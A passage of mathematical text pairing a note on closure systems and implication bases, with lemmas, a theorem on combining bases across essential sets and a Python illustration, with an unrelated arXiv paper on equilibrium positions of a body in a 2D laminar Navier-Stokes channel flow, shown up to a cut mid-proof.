X,\phi\rangle\) is called a _critical set_ if there is no quasi-closed set \(S\subsetneq Q\) such that \(\phi(S)=\phi(Q)\). In [3], J.L. Guigues and V. Duquenne showed that if \(X\) is finite, the set of implications \(\{C\rightarrow\phi(C):C\text{ is critical}\}\) is an implication basis for \(\langle X,\phi\rangle\). Guigues and Duquenne showed further that if \(\Sigma\) is an implication basis for \(\langle X,\phi\rangle\), where \(X\) is finite, and \(\sigma\) is the saturation operator associated with \(\langle X,\phi\rangle\), then for every critical set \(C\) there must be an implication \(A\to B\) in \(\Sigma\) such that \(\sigma(A)=C\). In particular, \(\phi(A)\) is an essential set. A stronger characterization of the implication bases associated with a closure system is given.
In particular, it is possible to more precisely describe the right sides of implications in a basis. This characterization can be used to show that groups of implications corresponding to distinct essential sets are independent, in the sense that those groups of implications can be combined arbitrarily to form a valid basis. This result resolves Conjecture 67 of [1] about the right sides of _optimal bases_ - implication bases where the sum of all cardinalities of the left and right sides of all implications is minimal.

The following lemma is equivalent to Proposition 19 of [2].

**Lemma 1**.: _Let \(X\) be a finite set and let \(\langle X,\phi_{1}\rangle\) and \(\langle X,\phi_{2}\rangle\) be two closure systems on \(X\). Let \(F_{1}\) be the family of closed sets associated with \(\langle X,\phi_{1}\rangle\) and let \(F_{2}\) be the family of closed sets associated with \(\langle X,\phi_{2}\rangle\). Suppose that \(F_{1}\subsetneq F_{2}\). Then there exists a quasi-closed set \(Q\) associated with \(\langle X,\phi_{1}\rangle\) such that \(Q\in F_{2}\)._

Proof.: Since \(X\) is finite, we may let \(A\) be a member of \(F_{2}\setminus F_{1}\) such that no proper subset of \(A\) is in \(F_{2}\setminus F_{1}\). Then for all \(B\in F_{1}\), \(A\cap B\in F_{2}\), so by the minimality of \(A\) it either equals \(A\) or is in \(F_{1}\); hence \(A\) is a quasi-closed set of \(\langle X,\phi_{1}\rangle\).

The next lemma establishes a connection between quasi-closed sets and the right sides of implications.

**Lemma 2**.: _Let \(X\) be a finite set, let \(\langle X,\phi\rangle\) be a closure system on \(X\), and let \(F\) be the family of closed sets associated with \(\langle X,\phi\rangle\). Let \(\Sigma\) be a set of implications on \(X\). Let \(F_{\Sigma}\) be the family of closed sets associated with \(\Sigma\). Then \(F_{\Sigma}=F\) if and only if the following two conditions hold:_

1. _For every implication \((A\to B)\in\Sigma\), \(B\subseteq\phi(A)\)._
2. _For every quasi-closed set \(Q\) associated with \(\langle X,\phi\rangle\), there exists an implication \((A\to B)\in\Sigma\) such that \(A\subseteq Q\) and \(B\not\subseteq Q\)._

Proof.: If condition (1) holds, then for any \(S\in F\) and any \((A\to B)\in\Sigma\), \(A\subseteq S\implies\phi(A)\subseteq S\implies B\subseteq S\), so \(S\in F_{\Sigma}\); then it follows that \(F\subseteq F_{\Sigma}\). Condition (2) implies that for any quasi-closed set \(Q\) associated with \(F\), \(Q\not\in F_{\Sigma}\). Then by Lemma 1, \(F_{\Sigma}\) is not a proper superset of \(F\), so \(F_{\Sigma}=F\). The reverse direction is straightforward. If condition (1) fails and \(A\to B\) is an implication in \(\Sigma\) such that \(B\not\subseteq\phi(A)\), then \(\phi(A)\not\in F_{\Sigma}\) (and \(\phi(A)\in F\)). If condition (2) fails and \(Q\) is a quasi-closed set associated with \(\langle X,\phi\rangle\) such that for all \((A\to B)\in\Sigma\), \(A\subseteq Q\implies B\subseteq Q\), then \(Q\in F_{\Sigma}\) (and \(Q\not\in F\)).

The following theorem establishes a form of independence between implications corresponding to distinct essential sets.

**Theorem 3**.: _Let \(\langle X,\phi\rangle\) be a finite closure system, let \(E_{1},...,E_{n}\) be the essential sets of \(\langle X,\phi\rangle\), and let \(\Sigma_{1},...,\Sigma_{n}\) be implication bases for \(\langle X,\phi\rangle\). For each \(i\), let \(\Sigma^{\prime}_{i}=\{(A\to B)\in\Sigma_{i}:\phi(A)=E_{i}\}\). Let \(\Sigma=\cup\Sigma^{\prime}_{i}\).
Then \(\Sigma\) is a valid implication basis of \(\langle X,\phi\rangle\)._

Proof.: Since every implication in \(\Sigma\) is included in another valid implication basis of \(\langle X,\phi\rangle\), \(\Sigma\) satisfies condition (1) of Lemma 2. Let \(Q\) be a quasi-closed set associated with \(\langle X,\phi\rangle\), and let \(E_{i}=\phi(Q)\). By Lemma 2, we may let \(A\to B\) be an implication in \(\Sigma_{i}\) such that \(A\subseteq Q\) and \(B\not\subseteq Q\). Then \(\phi(A)\not\subseteq Q\), and since \(Q\) is quasi-closed it follows that \(\phi(A)=\phi(Q)=E_{i}\). Therefore \((A\to B)\in\Sigma\). It now follows that \(\Sigma\) satisfies condition (2) of Lemma 2, so \(\Sigma\) is a valid implication basis for \(\langle X,\phi\rangle\).

The following corollary resolves Conjecture 67 of [1].

**Corollary 4**.: _Let \(\langle X,\phi\rangle\) be a finite closure system, let \(E\) be an essential set of \(\langle X,\phi\rangle\), and let \(\Sigma\) be an optimal basis for \(\langle X,\phi\rangle\). If \(A_{1}\to B_{1},...,A_{n}\to B_{n}\) are all the implications in \(\Sigma\) where \(\phi(A_{i})=E\), then \(s=|B_{1}|+...+|B_{n}|\) is fixed (i.e., \(s\) does not depend on the choice of \(\Sigma\))._

Proof.: Let \(\sigma\) be the saturation operator associated with \(\langle X,\phi\rangle\). Let \(\Sigma^{\prime}\) be another optimal basis for \(\langle X,\phi\rangle\) where \(A^{\prime}_{1}\to B^{\prime}_{1},...,A^{\prime}_{n}\to B^{\prime}_{n}\) are all the implications in \(\Sigma^{\prime}\) with \(\phi(A^{\prime}_{i})=E\) and \(\sigma(A^{\prime}_{i})=\sigma(A_{i})\). For each \(i\), \(|A^{\prime}_{i}|=|A_{i}|\) because \(A_{i}\) and \(A^{\prime}_{i}\) have minimal cardinality among all sets with saturation equal to \(\sigma(A_{i})\) [1, Theorem 5 (c)]. Let \(s^{\prime}=|B^{\prime}_{1}|+...+|B^{\prime}_{n}|\) and assume without loss of generality that \(s^{\prime}\leq s\). Let \(\Sigma^{\prime\prime}=\{A\to B\mid(A\to B)\in\Sigma^{\prime}\wedge\phi(A)=E\} \cup\{A\to B\mid(A\to B)\in\Sigma\wedge\phi(A)\neq E\}\). By Theorem 3, \(\Sigma^{\prime\prime}\) is a valid basis for \(\langle X,\phi\rangle\). By construction, the size (i.e., the sum of all cardinalities of the left and right sides of each implication) of \(\Sigma^{\prime\prime}\) is no greater than the size of \(\Sigma\). But \(\Sigma\) is optimal, so the size of \(\Sigma^{\prime\prime}\) must equal the size of \(\Sigma\), and it follows that \(s^{\prime}=s\).
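For a concrete illustration of Lemma 2, the following sketch builds a small closure system on \(X=\{1,2,3\}\) from two made-up implications, enumerates its quasi-closed sets, and checks that a second candidate set of implications generates the same closed sets exactly when conditions (1) and (2) hold. It is an illustrative aid only, not part of the development above.

```python
from itertools import chain, combinations

X = {1, 2, 3}

def powerset(s):
    s = list(s)
    return [frozenset(c) for c in
            chain.from_iterable(combinations(s, r) for r in range(len(s) + 1))]

def closure_from_implications(S, implications):
    """Smallest superset of S obeying every implication A -> B."""
    S = set(S)
    changed = True
    while changed:
        changed = False
        for A, B in implications:
            if A <= S and not B <= S:
                S |= B
                changed = True
    return frozenset(S)

def closed_sets(implications):
    return {S for S in powerset(X) if closure_from_implications(S, implications) == S}

# Toy basis: {1} -> {2} and {2,3} -> {1}.
sigma = [(frozenset({1}), frozenset({2})), (frozenset({2, 3}), frozenset({1}))]
F = closed_sets(sigma)

def phi(A):
    """Closure operator of the system generated by sigma."""
    return closure_from_implications(A, sigma)

def is_quasi_closed(Q):
    return Q not in F and all(S >= Q or (S & Q) in F for S in F)

quasi = [Q for Q in powerset(X) if is_quasi_closed(Q)]

def lemma2_conditions(candidate):
    cond1 = all(B <= phi(A) for A, B in candidate)
    cond2 = all(any(A <= Q and not B <= Q for A, B in candidate) for Q in quasi)
    return cond1 and cond2

# A different candidate generating the same closure system.
candidate = [(frozenset({1}), frozenset({1, 2})),
             (frozenset({2, 3}), frozenset({1, 2, 3}))]
assert lemma2_conditions(candidate)
assert closed_sets(candidate) == F   # Lemma 2: conditions (1)+(2) give the same F
print("closed sets:      ", sorted(map(sorted, F)))
print("quasi-closed sets:", sorted(map(sorted, quasi)))
```

On this toy system the quasi-closed sets are \(\{1\}\) and \(\{2,3\}\), with essential sets \(\{1,2\}\) and \(\{1,2,3\}\).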
2304.01180
Asymmetric equilibrium configurations of a body immersed in a 2D laminar flow
We study the equilibrium configurations of a possibly asymmetric fluid-structure-interaction problem. The fluid is confined in a bounded planar channel and is governed by the stationary Navier-Stokes equations with laminar inflow and outflow. A body is immersed in the channel and is subject to both the lift force from the fluid and to some external elastic force. Asymmetry, which is motivated by natural models, and the possibly non-vanishing velocity of the fluid on the boundary of the channel require the introduction of suitable assumptions to prevent collisions of the body with the boundary. With these assumptions at hand, we prove that for sufficiently small inflow/outflow there exists a unique equilibrium configuration. Only if the inflow, the outflow and the body are all symmetric, the configuration is also symmetric. A model application is also discussed.
Edoardo Bocchi, Filippo Gazzola
2023-04-03T17:50:30Z
http://arxiv.org/abs/2304.01180v2
# Asymmetric equilibrium configurations of a body immersed in a 2D laminar flow

###### Abstract.

We study the equilibrium configurations of a possibly asymmetric fluid-structure-interaction problem. The fluid is confined in a bounded planar channel and is governed by the stationary Navier-Stokes equations with laminar inflow and outflow. A body is immersed in the channel and is subject to both the lift force from the fluid and to some external elastic force. Asymmetry, which is motivated by natural models, and the possibly non-vanishing velocity of the fluid on the boundary of the channel require the introduction of suitable assumptions to prevent collisions of the body with the boundary. With these assumptions at hand, we prove that for sufficiently small inflow/outflow there exists a unique equilibrium configuration. Only if the inflow, the outflow and the body are all symmetric, the configuration is also symmetric. A model application is also discussed.

**Mathematics Subject Classification:** 35Q35, 76D05, 74F10.

## 1. Introduction

Let \(L>H>0\) and consider the rectangle \(R=(-L,L)\times(-H,H)\). Let \(B\subset R\) be a closed smooth domain having barycenter at the origin \((x_{1},x_{2})=(0,0)\) and such that \(\operatorname{diam}(B)\ll L,H\). We study the behavior of a stationary laminar (horizontal) fluid flow going through \(R\) and filling the domain \(\Omega_{h}=R\setminus B_{h}\), where \(B_{h}=B+he_{2}\) for some \(h\) (a vertical translation of \(B\)), see Figure 1. Note that \(B_{0}=B\). The fluid is governed by the stationary 2D Navier-Stokes equations \[-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\quad\nabla\cdot u=0\quad\text{in}\quad \Omega_{h}, \tag{1.1}\] complemented with inhomogeneous Dirichlet boundary conditions on \(\partial\Omega_{h}=\partial B_{h}\cup\partial R\), see (2.4) below. Here, \(\mu>0\) is the kinematic viscosity, \(u\) is the velocity vector field, \(p\) is the scalar pressure.

Figure 1. The rectangle \(R\) and the body \(B\) with its vertical displacements \(B_{h}\).

The body \(B\) is subject to two vertical forces. The first force (the lift) is due to the fluid flow and tends to move \(B\) away from its original position \(B_{0}\); it is expressed through a boundary integral over \(\partial B\), see (3.1) below. The second force is mechanical (elastic) and acts as a restoring force tending to maintain \(B\) in \(B_{0}\). When there is no inflow/outflow, the body is only subject to the restoring force and remains in \(B_{0}\), which is the unique equilibrium position. But, as soon as there is a fluid flow, these two forces start competing and one may wonder if the body remains in \(B_{0}\) or, at least, if the equilibrium position remains unique. We show that, if the inflow/outflow is sufficiently small, then the equilibrium position of \(B\) remains unique and coincides with \(B_{h}\) for some \(h\) close to zero. We point out that, contrary to [3, 7, 9], _we make no symmetry assumptions on either \(B\) or the laminar inflow/outflow_. Therefore, not only will the overall configuration be asymmetric, but also some of the techniques developed in these papers do not work and \(B_{h}\) may be different from \(B_{0}\). The motivation for studying asymmetric configurations comes from nature. Only very few bodies are perfectly symmetric and most fluid flows, although laminar in the horizontal direction, are asymmetric in the vertical direction: think of a horizontal wind depending on the altitude or the water flow in a river depending on the distance from the banks.
Figure 2 shows two front waves in sandstorms that have no vertical symmetry although the wind is (almost) horizontally laminar.

Figure 2. Front wave of two wind storms.

In Section 2 we give a detailed description of our model and we prove that, for small Reynolds numbers, the Navier-Stokes equations are uniquely solvable in any \(\Omega_{h}\), see Theorem 2.2. The related a priori bounds depend on \(h\), and this is one crucial difference compared to the (symmetric) Poiseuille inflow/outflow considered in [3]. It is well-known [4] that to solve inhomogeneous Dirichlet problems for the Navier-Stokes equations, one needs to find a solenoidal extension of the boundary data and to transform the original problem into a homogeneous Dirichlet problem with an additional source term. For the existence issue, one can use the classical Hopf extension, but there are infinitely many other possible choices for the solenoidal extension. One of them, introduced in [10], was used in [3] to write the lift force as a volume integral by means of the solution of an auxiliary Stokes problem. For asymmetric flows, the same solenoidal extension does not allow one to estimate all the boundary terms and, in order to obtain refined bounds for the solution to the Navier-Stokes equations in \(\Omega_{h}\), we build a new explicit solenoidal extension that also plays a fundamental role in the analysis of the subsequent fluid-structure-interaction (FSI) problem. The main physical interest in FSI problems is to determine the \(\omega\)-limit of the associated evolution equations because this allows one to forecast the long-time behavior of the structure. Since the evolution Navier-Stokes equations are dissipative, one is led to investigate if the global attractor exists, see [6, 13]: the main difficulty is that the corresponding phase space is time-dependent and semigroup theory does not apply. The global attractor contains stationary solutions of the evolution FSI problem that we call equilibrium configurations, which are investigated in the present work.

In Section 3 we introduce the lift force and the restoring force and we set up the steady-state FSI problem. Our main result (Theorem 3.1) states that, for small Reynolds numbers, the equilibrium position is unique and may differ from \(B_{0}\). To prove this result, we need some bounds on the lift force in proximity of collisions of \(B_{h}\) with \(\partial R\): these bounds are collected in Theorem 3.2 and proved in Section 4 by using the very same solenoidal extension introduced in Section 2. The remaining part of the proof of Theorem 3.1 is divided into two steps. In Subsection 5.1 we prove some properties of the global force exerted on the body \(B\). These properties are then used in Subsection 5.2 to complete the proof by means of an implicit function argument, combined with some delicate bounds involving derivatives of moving boundary integrals. We emphasize that for our FSI problem we cannot use the explicit expression of the lift derivative as in [15] because the displacements \(B_{h}\) within \(R\) do not follow the normal of \(\partial B_{h}\), in particular if \(\partial B_{h}\) contains some vertical segments. Instead, based on the general approach introduced in [2] (see also the previous work [12]), we compute with high precision the lift variation with respect to the vertical displacement parameter \(h\) of \(B_{h}\) by acting directly on the strong form of the FSI problem.
Section 6 contains the symmetric version of Theorem 3.1, see Theorem 6.1 which states that, under symmetry assumptions on the inflow/outflow and on \(B\), for small Reynolds numbers the equilibrium position is unique and coincides with \(B_{0}\). This extends former results in [3, 7, 9] to a wider class of symmetric frameworks. As an application of our results, in Section 7 we consider a model where \(B_{h}\) represents the cross-section of the deck of a suspension bridge [5], while \(\Omega_{h}\) is filled by the air and represents either a virtual box around the deck or a wind tunnel around a scaled model of the bridge. Since the deck may have a nonsmooth boundary, we also explain how to extend our results to the case where \(B\) is merely Lipschitz. ## 2. Fluid boundary-value problem Let \(R\) and \(B\) be as in Section 1 (Figure 1) with \[B\text{ of class }W^{2,\infty}. \tag{2.1}\] On the one hand, (2.1) ensures the regularity \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\) for the solutions to (1.1), see [12, Theorem 2.1] and Theorem 2.2 below. On the other hand, in engineering applications \(B\) is usually a polygon with rounded corners, see Section 7, which belongs to \(W^{2,\infty}\) but not to \(C^{2}\). Let \[\delta_{b}:=-\min_{(x_{1},x_{2})\in\partial B}x_{2}>0,\quad\delta_{t}:=\max_{ (x_{1},x_{2})\in\partial B}x_{2}>0,\quad\tau:=\max_{(x_{1},x_{2})\in\partial B }|x_{1}|. \tag{2.2}\] Since we consider vertical displacements \(B_{h}\) within \(R\), we have \(h\in(-H+\delta_{b},H-\delta_{t})\) and \(B_{h}\subset[-\tau,\tau]\times[h-\delta_{b},h+\delta_{t}]\) for any such \(h\). Then, \(\partial\Omega_{h}=\partial B_{h}\cup\partial R\). The bottom and top parts of \(\partial R\) are respectively \[\Gamma_{b}=[-L,L]\times\{-H\}\quad\text{and}\quad\Gamma_{t}=[-L,L]\times\{H\},\] while its lateral left and right parts are, respectively, \[\Gamma_{l}=\{-L\}\times[-H,H]\quad\text{and}\quad\Gamma_{r}=\{L\}\times[-H,H].\] Let \(V_{\text{in}},V_{\text{out}}\in W^{2,\infty}(-H,H)\cap C^{0}[-H,H]\) satisfy \[\begin{split} V_{\text{in}}(-H)=V_{\text{out}}(-H)=0,\quad V_{ \text{in}}(H)=V_{\text{out}}(H)=U\geq 0,\\ \int_{-H}^{H}V_{\text{in}}(x_{2})dx_{2}=\int_{-H}^{H}V_{\text{out }}(x_{2})dx_{2}.\end{split} \tag{2.3}\] For some \(\lambda\geq 0\), we consider the boundary-value problem \[\begin{split}-\mu\Delta u+u\cdot\nabla u+\nabla p=0,\qquad \nabla\cdot u=0\quad\text{in}\quad\Omega_{h},\\ u_{|_{\partial B_{h}}}\!=\!u_{|_{\Gamma_{b}}}\!=0,\quad u_{|_{ \Gamma_{t}}}\!=\lambda Ue_{1},\quad u_{|_{\Gamma_{l}}}\!=\lambda V_{\text{in} }(x_{2})e_{1},\quad u_{|_{\Gamma_{r}}}\!=\lambda V_{\text{out}}(x_{2})e_{1}. \end{split} \tag{2.4}\] Note that \(u_{|_{\partial R}}\in C^{0}(\partial R)\) and (2.3)-(2.4) are compatible with the Divergence Theorem. The role of \(\lambda\geq 0\) in the boundary conditions is to measure with a unique parameter the strength of both the inflow and outflow and \(\lambda/\mu\) is the Reynolds number. **Definition 2.1**.: We say that \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\) is a strong solution to (2.4) if the differential equations are satisfied a.e. in \(\Omega_{h}\) and the boundary conditions are satisfied as restrictions (recall that \(H^{2}(\Omega_{h})\subset C^{0}(\overline{\Omega_{h}})\)). We now state an apparently classical existence and uniqueness result which, however, has some novelties. First, since the domain \(\Omega_{h}\) is only Lipschitzian, the regularity of the solution is obtained through a geometric reflection. 
More important, we provide an explicit upper bound for the blow-up of the \(H^{1}\)-norm of the unique solution to (2.4) in proximity of collision: when \(B\) approaches \(\Gamma_{b}\) the norm remains bounded, while when \(B\) approaches \(\Gamma_{t}\) we estimate its blow-up. This refined bound requires the construction of a suitable solenoidal extension of the boundary data. Note that, up to normalization, we can reduce to the cases where \[U\in\{0,1\}. \tag{2.5}\] In order to state the result, we define the distances of the body \(B_{h}\) to \(\Gamma_{b}\) and \(\Gamma_{t}\) respectively by \[\varepsilon_{b}(h):=H-\delta_{b}+h,\qquad\varepsilon_{t}(h):=H-\delta_{t}-h. \tag{2.6}\] Hence, \(0<\varepsilon_{b}(h),\varepsilon_{t}(h)\leq 2H-\delta_{b}-\delta_{t}\) for any \(h\in(-H+\delta_{b},H-\delta_{t})\). Throughout the paper, any (positive) constant depending only on \(\mu\), \(B_{0}\), \(L\), \(H\) will be denoted by \(C\) and, when it depends also on \(h\), by \(C_{h}\). We may now state

**Theorem 2.2**.: _Let \(h\in(-H+\delta_{b},H-\delta_{t})\) and assume (2.3) with (2.5). Then (2.4) admits a strong solution \((u,p)\) for any \(\lambda\geq 0\) and there exists \(\Lambda>0\) such that the solution is unique if \(\lambda\in[0,\Lambda)\). Moreover, there exist \(C>0\) and \(C_{h}>0\) such that the unique solution (when \(\lambda<\Lambda\)) satisfies_ \[\|u\|_{H^{1}(\Omega_{h})}\leq C(1+U(\varepsilon_{t}(h))^{-3/2})\lambda, \tag{2.7}\] \[\|u\|_{H^{2}(\Omega_{h})}+\|p\|_{H^{1}(\Omega_{h})}\leq C_{h}\lambda. \tag{2.8}\]

_A priori bounds such as (2.7) and (2.8) are available for any \(\lambda\geq 0\) and any strong solution of (2.4), but with different powers of \(\lambda\)._

Proof.: _Existence of weak solutions._ For later use, we first define weak solutions for the forced Navier-Stokes equations \[-\mu\Delta u+u\cdot\nabla u+\nabla p=f,\qquad\nabla\cdot u=0\quad\text{in} \quad\Omega_{h}, \tag{2.9}\] which reduces to (2.4) when \(f=0\). We say that \(u\in H^{1}(\Omega_{h})\) is a weak solution to (2.9) with \(f\in L^{2}(\Omega_{h})\) if \(u\) is a solenoidal vector field satisfying the boundary conditions in the trace sense and \[\mu\int_{\Omega_{h}}\nabla u:\nabla\varphi+\int_{\Omega_{h}}u\cdot\nabla u \cdot\varphi=\int_{\Omega_{h}}f\cdot\varphi \tag{2.10}\] for all \(\varphi\in W(\Omega_{h}):=\{\varphi\in H^{1}_{0}(\Omega_{h}):\nabla\cdot \varphi=0\text{ a.e. in }\Omega_{h}\}\). For any weak solution \(u\), there exists a unique associated \(p\in L^{2}_{0}(\Omega_{h})\) (_i.e._ with zero mean value), satisfying \[\mu\int_{\Omega_{h}}\nabla u:\nabla\psi+\int_{\Omega_{h}}u\cdot\nabla u\cdot \psi-\int_{\Omega_{h}}p\nabla\cdot\psi=\int_{\Omega_{h}}f\cdot\psi \tag{2.11}\] for all \(\psi\in H^{1}_{0}(\Omega_{h})\) (Lemma IX.1.2, [4]). We introduce the well-known Hopf solenoidal extension \(s\) and recast (2.4) as (2.9) with homogeneous boundary conditions \[-\mu\Delta v+v\cdot\nabla v+\nabla p=f,\quad\nabla\cdot v=0\quad\text{in} \quad\Omega_{h},\qquad v_{|_{\partial\Omega_{h}}}=0, \tag{2.12}\] where \(f=\mu\Delta s-s\cdot\nabla v-v\cdot\nabla s-s\cdot\nabla s\). Then there exists \(v\in W(\Omega_{h})\) satisfying (2.10) for any \(\lambda\geq 0\) (Theorem IX.4.1, [4]). This is equivalent to saying that the vector field \(u=v+s\in H^{1}(\Omega_{h})\) and the associated pressure \(p\in L^{2}(\Omega_{h})\) satisfy (2.10)-(2.11) with \(f=0\).
Moreover, \(\nabla\cdot u=0\), \(u_{|_{\partial\Omega_{h}}}=s_{|_{\partial\Omega_{h}}}\) and \[\begin{split}\|u\|_{H^{1}(\Omega_{h})}&\leq C(\| \nabla v\|_{L^{2}(\Omega_{h})}+\|s\|_{H^{1}(\Omega_{h})})\\ &\leq C((1+\tfrac{1}{\mu})\|s\|_{H^{1}(\Omega_{h})}+\tfrac{1}{\mu} \|s\|_{H^{1}(\Omega_{h})}^{2})\leq C_{h}(\lambda+\lambda^{2})\,,\end{split} \tag{2.13}\] \[\|p\|_{L^{2}(\Omega_{h})}\leq C(\mu\|u\|_{H^{1}(\Omega_{h})}+\|u\|_{H^{1}( \Omega_{h})}^{2})\leq C_{h}(\lambda+\lambda^{4}). \tag{2.14}\] In these bounds and the ones below we only emphasize the smallest and largest powers of \(\lambda\), as for any polynomial. These bounds are not part of the statement but they will be used later in the present proof. _Regularity._ We claim that any weak solution \((u,p)\) to (2.4) satisfies \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\). This would be straightforward if \(\Omega_{h}\in W^{2,\infty}\), see [12], but \(R\) is only Lipschitzian. Here, we take advantage of the particular shape of \(R\) and use a reflection argument as in [8]. We construct a new domain \(\Omega_{h}^{t}=R^{t}\setminus B_{h}^{t}\), obtained by reflecting \(\Omega_{h}\) across \(\Gamma_{t}\), where \(R^{t}=[-L,L]\times[H,3H]\) and \(B_{h}^{t}\) is the reflection of \(B_{h}\) with respect to \(\Gamma_{t}\). Define \((u^{t},p^{t}):\Omega_{h}^{t}\to\mathbb{R}^{2}\times\mathbb{R}\) by \[u_{1}^{t}(x_{1},H+x_{2})=u_{1}(x_{1},H-x_{2}),\quad u_{2}^{t}(x_{1},H+x_{2})=-u _{2}(x_{1},H-x_{2}),\] \[p^{t}(x_{1},H+x_{2})=p(x_{1},H-x_{2}),\] which satisfies \[-\mu\Delta u^{t}+u^{t}\cdot\nabla u^{t}+\nabla p^{t}=0,\quad\nabla\cdot u^{t}= 0\quad\text{in}\quad\Omega_{h}^{t}. \tag{2.15}\] Similarly, let \(\Omega_{h}^{b}=R^{b}\setminus B_{h}^{b}\) with \(R^{b}=[-L,L]\times[-3H,-H]\) and \(B_{h}^{b}\) is the reflection of \(B_{h}\) with respect to \(\Gamma_{b}\). Define \((u^{b},p^{b}):\Omega_{h}^{b}\to\mathbb{R}^{2}\times\mathbb{R}\) by \[u_{1}^{b}(x_{1},-H-x_{2})=u_{1}(x_{1},-H+x_{2}),\quad u_{2}^{b}( x_{1},-H-x_{2})=-u_{2}(x_{1},-H+x_{2}),\] \[p^{b}(x_{1},-H-x_{2})=p(x_{1},-H+x_{2}),\] which satisfies the corresponding of (2.15) in \(\Omega_{h}^{b}\). With the same principle, we then perform two horizontal reflections of \(\Omega_{h}^{b}\cup\Omega_{h}\cup\Omega_{h}^{t}\) with respect to \(x_{1}=\pm L\). We define \(\widetilde{R}=(-3L,3L)\times(-3H,3H)\) and \(\widetilde{\Omega}_{h}=\widetilde{R}\setminus\cup_{i}\overline{B_{h}^{i}}\) where \(B_{h}^{i}\) is either \(B_{h}\) or one of its eight reflections. Then, if \((\widetilde{u},\widetilde{p}):\widetilde{\Omega}_{h}\to\mathbb{R}^{2}\times \mathbb{R}\) denotes the extension of \((u,p)\), \[-\mu\Delta\widetilde{u}+\widetilde{u}\cdot\nabla\widetilde{u}+\nabla \widetilde{p}=0,\quad\nabla\cdot\widetilde{u}=0\quad\text{in}\quad\widetilde{ \Omega}_{h},\qquad\widetilde{u}_{|_{\partial B_{h}}}=0 \tag{2.16}\] and \(\tilde{u}\) satisfies further boundary conditions that we do not need to make explicit here. After introducing a suitable solenoidal extension, we can proceed as in the first part of the proof and obtain the existence of a solution \((\widetilde{u},\widetilde{p})\in H^{1}(\widetilde{\Omega}_{h})\times L^{2}( \widetilde{\Omega}_{h})\) satisfying the bounds (2.13)-(2.14). 
Hence, \(\widetilde{u}\cdot\nabla\widetilde{u}\in L^{3/2}(\widetilde{\Omega}_{h})\) and \[\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{3/2}(\widetilde{\Omega}_{h})} \leq\|\widetilde{u}\|_{L^{6}(\widetilde{\Omega}_{h})}\|\nabla\widetilde{u}\|_{ L^{2}(\widetilde{\Omega}_{h})}\leq C\|\widetilde{u}\|_{H^{1}(\widetilde{\Omega}_{h})}^{2} \leq C_{h}(\lambda^{2}+\lambda^{4}) \tag{2.17}\] with \(C_{h}=C(\widetilde{\Omega}_{h})\). By applying [4, Theorem IV.5.1] to the Stokes problem (2.16), we infer that \((\widetilde{u},\widetilde{p})\in W^{2,3/2}(\Omega^{\prime})\times W^{1,3/2}( \Omega^{\prime})\) for any \(\Omega^{\prime}\subset\widetilde{\Omega}_{h}\) and \[\begin{split}&\|\widetilde{u}\|_{W^{2,3/2}(\Omega^{\prime})}+\| \widetilde{p}\|_{W^{1,3/2}(\Omega^{\prime})}\\ &\leq C_{h}(\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{3/2}( \widetilde{\Omega}_{h})}+\|\widetilde{u}\|_{W^{1,3/2}(\widetilde{\Omega}_{h})} +\|\widetilde{p}\|_{L^{3/2}(\widetilde{\Omega}_{h})})\leq C_{h}(\lambda+ \lambda^{4})\end{split} \tag{2.18}\] with \(C_{h}=C(\Omega^{\prime},\widetilde{\Omega}_{h})\). We recall that \((\widetilde{u},\widetilde{p})=(u,p)\) in \(\Omega_{h}\). Then, using Sobolev embedding \(W^{2,3/2}\hookrightarrow W^{1,6}\) in \(\mathbb{R}^{2}\) and a bootstrap argument we obtain that \((u,p)\in H^{2}(\Omega_{h})\times H^{1}(\Omega_{h})\). Moreover, from (2.17)-(2.18) we get \[\begin{split}\|u\|_{H^{2}(\Omega_{h})}+\|p\|_{H^{1}(\Omega_{h})}& \leq C_{h}(\|\widetilde{u}\cdot\nabla\widetilde{u}\|_{L^{2}(\Omega^{ \prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^{\prime})}+\|\widetilde{p}\|_{L^{2}( \Omega^{\prime})})\\ &\leq C_{h}(\|\widetilde{u}\|_{L^{3}(\Omega^{\prime})}\|\nabla \widetilde{u}\|_{L^{6}(\Omega^{\prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^{ \prime})}+\|\widetilde{p}\|_{L^{2}(\Omega^{\prime})})\\ &\leq C_{h}(\|\widetilde{u}\|_{H^{1}(\Omega^{\prime})}\| \widetilde{u}\|_{W^{2,3/2}(\Omega^{\prime})}+\|\widetilde{u}\|_{H^{1}(\Omega^ {\prime})}+\|\widetilde{p}\|_{L^{2}(\Omega^{\prime})})\\ &\leq C_{h}(\lambda+\lambda^{4})\end{split}\] with \(C_{h}=C(\Omega_{h},\widetilde{\Omega}_{h})\). _Uniqueness._ Let \(u_{1}\) and \(u_{2}\) be two weak solutions to (2.4), let \(w=u_{1}-u_{2}\), then \[\mu\int_{\Omega_{h}}\nabla w:\nabla\varphi+\int_{\Omega_{h}}w\cdot\nabla w \cdot\varphi=-\int_{\Omega_{h}}(w\cdot\nabla u_{2}+u_{2}\cdot\nabla w)\cdot\varphi\] for all \(\varphi\in W(\Omega_{h})\). Then take \(\varphi=w\) so that the latter yields \[\begin{split}\mu\|\nabla w\|_{L^{2}(\Omega_{h})}^{2}& =-\int_{\Omega_{h}}\!\!w\cdot\nabla u_{2}\cdot w\leq\|\nabla u_{2}\|_{L^{2}( \Omega_{h})}\|w\|_{L^{4}(\Omega_{h})}^{2}\\ &\leq C_{h}(1+\frac{1}{\mu})(\lambda+\lambda^{2})\|\nabla w\|_{L^{ 2}(\Omega_{h})}^{2},\end{split} \tag{2.19}\] where we used Holder, Ladyzhenskaya and Poincare inequalities and (2.13). Hence, there exists \(\Lambda>0\) such that \[\lambda\in[0,\Lambda)\iff C_{h}(1+\tfrac{1}{\mu})(\lambda+\lambda^{2})<\mu \tag{2.20}\] and this condition implies \(\|\nabla w\|_{L^{2}(\Omega_{h})}=0\) and, in turn, \(w=0\) since \(w_{|_{\partial\Omega_{h}}}=0\). _Refined bounds._ For \(\lambda\in[0,\Lambda)\), in all the above bounds we can drop the largest power of \(\lambda\) and they all become linear upper bounds. We treat separately the cases \(U=1\) and \(U=0\) and we make explicit the dependence of the constant \(C_{h}\) in (2.13) on \(h\). 
